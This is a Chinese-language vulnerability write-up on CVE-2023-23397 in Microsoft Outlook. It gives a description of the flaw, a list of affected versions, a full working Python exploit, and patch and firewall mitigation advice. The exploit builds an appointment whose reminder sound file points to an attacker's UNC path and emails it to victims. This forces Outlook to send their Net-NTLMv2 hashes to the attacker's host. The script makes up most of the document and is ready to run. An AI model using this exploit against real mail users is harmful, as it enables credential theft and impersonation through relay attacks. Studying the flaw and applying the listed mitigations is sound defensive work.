# Microsoft Outlook 权限提升漏洞 CVE-2023-23397 ## 漏洞描述 该漏洞存在于 Microsoft Outlook 中,是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件,从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。 ## 漏洞影响 ``` Microsoft Outlook 2016 (64-bit edition) Microsoft Outlook 2013 Service Pack 1 (32-bit editions) Microsoft Outlook 2013 RT Service Pack 1 Microsoft Outlook 2013 Service Pack 1 (64-bit editions) Microsoft Office 2019 for 32-bit editions Microsoft 365 Apps for Enterprise for 32-bit Systems Microsoft Office 2019 for 64-bit editions Microsoft 365 Apps for Enterprise for 64-bit Systems Microsoft Office LTSC 2021 for 64-bit editions Microsoft Outlook 2016 (32-bit edition) Microsoft Office LTSC 2021 for 32-bit editions ``` ## 漏洞复现 exp: ``` python CVE-2023-23397.py --path '\\your-ip\' ``` ``` import smtplib, datetime, argparse from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.application import MIMEApplication from email.utils import COMMASPACE, formatdate from independentsoft.msg import Message ## Mail configuration : change it ! smtp_server = "mail.example.com" smtp_port = 587 sender_email = "attacker@mail.example.com" sender_password = "P@ssw0rd" recipients_email = ["victim@mail.example.com"] class Email: def __init__(self, smtp_server, port, username, password, recipient): self.smtp_server = smtp_server self.port = port self.username = username self.password = password self.recipient = recipient def send(self, subject, body, attachment_path): msg = MIMEMultipart() msg['From'] = self.username msg['To'] = COMMASPACE.join(self.recipient) msg['Date'] = formatdate(localtime=True) msg['Subject'] = subject msg.attach(MIMEText(body)) with open(attachment_path, 'rb') as f: part = MIMEApplication(f.read(), Name=attachment_path) part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' msg.attach(part) try: server = smtplib.SMTP(self.smtp_server, self.port) server.starttls() server.login(self.username, self.password) server.sendmail(self.username, self.recipient, msg.as_string()) server.quit() print("[+] Malicious appointment sent !") except Exception as e: print("[-] Error with SMTP server...", e) parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) args = parser.parse_args() appointment = Message() appointment.message_class = "IPM.Appointment" appointment.subject = "CVE-2023-23397" appointment.body = "New meeting now !" appointment.location = "Paris" appointment.appointment_start_time = datetime.datetime.now() appointment.appointment_end_time = datetime.datetime.now() appointment.reminder_override_default = True appointment.reminder_sound_file = args.path appointment.save("appointment.msg") email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) subject = "Hello There !" body = "Important appointment !" email.send(subject, body, "appointment.msg") ``` ## 漏洞修复 目前微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁,建议受影响用户开启系统自动更新安装补丁进行防护。 注:由于网络问题、计算机环境问题等原因,Windows Update 的补丁更新可能出现失败。用户在安装补丁后,应及时检查补丁是否成功更新。右键点击Windows 徽标,选择“设置(N)”,选择“更新和安全”-“Windows 更新”,查看该页面上的他提示信息,也可点击“查看更新历史记录”查看历史更新情况。 针对未成功安装更新补丁的情况,可直接下载离线安装包进行更新,链接如下: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397 临时防护措施: 若用户无法正常进行补丁修复,在不影响正常业务的情况下,可使用以下措施对漏洞进行防护: 1. 将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。注意:该操作可能会对需要 NTLM 的应用程序造成一定影响。详情请参考: https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group 2. 用户可通过在网络中同时使用外围防火墙和本地防火墙,并通过 VPN 设置来阻止 TCP 445/SMB 从网络出站。注意:该操作将禁止发送 NTLM 身份验证消息到远程文件共享。